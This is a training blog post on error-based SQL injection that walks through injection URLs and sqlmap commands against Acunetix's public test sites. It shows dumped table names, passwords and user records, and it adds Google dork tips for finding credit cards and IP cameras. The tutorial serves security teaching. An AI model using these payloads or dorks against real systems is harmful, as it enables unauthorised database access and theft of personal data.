Ready to Start Your Career?

Error Based Injection

D3f3nd3r 's profile image

By: D3f3nd3r

January 18, 2018

Error Based InjectionError based injection mainly concentrated on Hacking Microsoft powered technologies like asp and aspx. Error based injection works on MS-SQL database and is bit different from the previous attack that is Union Based injection deployed on My-SQL database.• Here Database will be Ms-Sql Database:MY-SQL : PHPMS-SQL :  .asp or .aspx Difference between Union and Error Based Injection.1.  Extracting all Tables at one time from database•  Information_schema.tables will not return you the entire table names. 2.   MS SQL works on STACK principal means LAST IN FIRST OUT.• Hence the table which is on the top of the stack is going to be fetched first at the time of extraction for the same. 3.  Functions like database() , version() does not works in MS-SQL. 4.  “order by” or “union” does not works on MsSql  Target:testasp.vulnweb.com• It is a legal platform being provided by Acunetix for Security Testing Step 1: Get any GET method in the URL of the website.• We have to look for any Somethoing=Something.• Eg. Id=1 or pid=16 or product=milkhttps://testasp.vulnweb.com/showforum.asp?id=0 Step 2: Check the exception handling.http://testasp.vulnweb.com/showforum.asp?id=0' Step 3: Check the conditions required for further attack.http://testasp.vulnweb.com/showforum.asp?id=0 and 1=0; Note : Error Based Injection works on LIFO rule. Last in First out. For Example: If we have a database with tables like followingsthreads -> 1teacher->2classes->3fee->4users->5 Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and1=convert(int,(select top 1 table_name from information_schema.tables));• Got Table :  'threads' X http://testasp.vulnweb.com/showforum.asp?id=0 and1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads')));• Target : 'users' Step 5: Get the respective columns of the users tablehttp://testasp.vulnweb.com/showforum.asp?id=0 and1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));• Target Column : uname, upass Step 6: Get the uname and upasshttp://testasp.vulnweb.com/showforum.asp?id=0 and1=convert(int,(select top 1 upass from users));• uname:admin• upass: none Stack Based QueryRequirements1.   SQLMAP : its a python script based automated vulnerability assessment and penetration testing tool.2.   Kali Linux : SQLmap is inbuild in Kali Linux• You can also download the sqlmap version for windows from its official website. Introduction to SQL MAP------------------------Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Step 1: Open Your Linux TerminalStep 2: python sqlmap -u http://testphp.vulnweb.com/search.php?test=query --dbsOutput:Here We can see we got these below databases.[09:54:16] [INFO] fetching database namesAvailable databases [2]:[*] acuart <------- Target Database[*] information_schemaStep 3: Get the tables of the databasepython sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart --tablesHere We got all the tables available in the acuart databaseOutput:[09:58:49] [INFO] fetching tables for database: 'acuart'Database: acuart[8 tables]+-----------+| artists   || carts     || categ     || featured  || guestbook || pictures  || products  || users     |-------> Target Table+-----------+    Step 4: Get the columns of the users tablepython sqlmap -u http://testphp.vulnweb.com/search.php?test=query -T users --columnsOutput:Database: acuartTable: users[8 columns]+---------+--------------+| Column  | Type         |+---------+--------------+| address | mediumtext   || cart    | varchar(100) || cc      | varchar(100) || email   | varchar(100) || name    | varchar(100) || pass    | varchar(100) |---> Target| phone   | varchar(100) || uname   | varchar(100) |---> Target Step 5: Get the data from the columns of the above table.python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -U test -T users --dumpOutput:Database: acuartTable: users[1 entry]+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+| cc                        | name         | cart                             | pass | uname | phone   | email              | address |+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+| De nave queimando asfalto | Hiago Junior | a929b42ddb394d84a486976ac5782afc | test | test  | 2323345 | jurandir@gmail.com | foda-se |+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+ Google Hacking DatabaseJohny i Hack Stuff : Searched --> Google --> Credit Cards• Google DorksFilteration of results from google database.#inurl  -- Green Line in Google Search#intitle – Blue Line in Google Search#intext – Black Line in Google Seach#filetype – Type of file that we needed i.e. pdf, ppt, docs etc• IP CAMERASearching toolswww.exploit-db.com
Schedule Demo